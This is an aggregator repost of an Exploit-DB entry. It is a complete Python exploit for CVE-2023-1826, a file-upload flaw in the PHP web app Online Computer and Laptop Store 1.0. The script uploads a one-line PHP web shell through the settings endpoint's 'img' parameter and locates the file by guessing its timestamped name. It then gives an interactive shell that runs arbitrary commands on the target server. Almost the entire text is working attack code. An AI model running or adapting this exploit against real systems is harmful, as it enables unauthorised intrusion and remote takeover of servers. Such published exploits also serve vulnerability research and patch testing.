1
[webapps] Online Computer and Laptop Store 1.0 - Remote Code Execution (RCE)
source link: https://www.exploit-db.com/exploits/51358
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
#!/usr/bin/env python3
# Exploit Title: Online Computer and Laptop Store 1.0 - Remote Code Execution (RCE)
# Date: 09/04/2023
# Exploit Author: Matisse Beckandt (Backendt)
# Vendor Homepage: https://www.sourcecodester.com/php/16397/online-computer-and-laptop-store-using-php-and-mysql-source-code-free-download.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-ocls.zip
# Version: 1.0
# Tested on: Debian 11.6
# CVE : CVE-2023-1826
# Exploit Description : The application does not sanitize the 'img' parameter when sending data to '/classes/SystemSettings.php?f=update_settings'. An attacker can exploit this issue by uploading a PHP file and accessing it, leading to Remote Code Execution.
import requests
from argparse import ArgumentParser
from uuid import uuid4
from datetime import datetime, timezone
def interactiveShell(fileUrl: str):
print("Entering pseudo-shell. Type 'exit' to quit")
while True:
command = input("\n$ ")
if command == "exit":
break
response = requests.get(f"{fileUrl}?cmd={command}")
print(response.text)
def uploadFile(url: str, filename: str, content):
endpoint = f"{url}/classes/SystemSettings.php?f=update_settings"
file = {"img": (filename, content)}
response = requests.post(endpoint, files=file)
return response
def getUploadedFileUrl(url: str, filename: str):
timeNow = datetime.now(timezone.utc).replace(second=0) # UTC time, rounded to minutes
epoch = int(timeNow.timestamp()) # Time in milliseconds
possibleFilename = f"{epoch}_{filename}"
fileUrl = f"{url}/uploads/{possibleFilename}"
response = requests.get(fileUrl)
if response.status_code == 200:
return fileUrl
def exploit(url: str):
filename = str(uuid4()) + ".php"
content = "<?php system($_GET['cmd'])?>"
response = uploadFile(url, filename, content)
if response.status_code != 200:
print(f"[File Upload] Got status code {response.status_code}. Expected 200.")
uploadedUrl = getUploadedFileUrl(url, filename)
if uploadedUrl == None:
print("Error. Could not find the uploaded file.")
exit(1)
print(f"Uploaded file is at {uploadedUrl}")
try:
interactiveShell(uploadedUrl)
except KeyboardInterrupt:
pass
print("\nQuitting.")
def getWebsiteURL(url: str):
if not url.startswith("http"):
url = "http://" + url
if url.endswith("/"):
url = url[:-1]
return url
def main():
parser = ArgumentParser(description="Exploit for CVE-2023-1826")
parser.add_argument("url", type=str, help="The url to the application's installation. Example: http://mysite:8080/php-ocls/")
args = parser.parse_args()
url = getWebsiteURL(args.url)
exploit(url)
if __name__ == "__main__":
main()
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK